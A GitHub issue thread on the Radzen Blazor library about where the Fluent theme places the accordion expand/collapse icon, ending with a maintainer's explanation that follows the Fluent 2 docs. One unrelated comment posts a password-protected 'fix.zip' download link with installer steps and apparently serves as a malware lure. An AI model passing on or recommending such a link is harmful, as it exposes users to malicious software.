### ISSUE TITLE
Accordin theme fluent not corrent position expand/collapse

### ISSUE THREAD

**Issue by franklupo** [radzenhq/radzen-blazor#1668]
Hi,
currently expand/collapse image is on the left but in Fluent UI icon is on the right. 
Currently direction image not correct.

[currently 
](https://blazor.radzen.com/accordion?theme=fluent)

![image](https://github.com/user-attachments/assets/0cc9aae8-290d-42c0-b034-06c7b88d369d)

https://www.fluentui-blazor.net/Accordion

![image](https://github.com/user-attachments/assets/54d493ea-7310-4fa5-9c63-2897d9d9c116)

best reagrds

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yordanov** [comment]
The Fluent theme is based on the official Fluent 2 docs with toggle icons on the left hand side: 
<img width="210" alt="image" src="https://github.com/user-attachments/assets/75cef62b-780b-4a7f-9f94-5b158839d9c4">
https://develop.fluentui.dev/components/web/react/accordion/usage

The difference in icon's look and feel is due to the Material Symbols icon font, which is the default one in Radzen.Blazor.
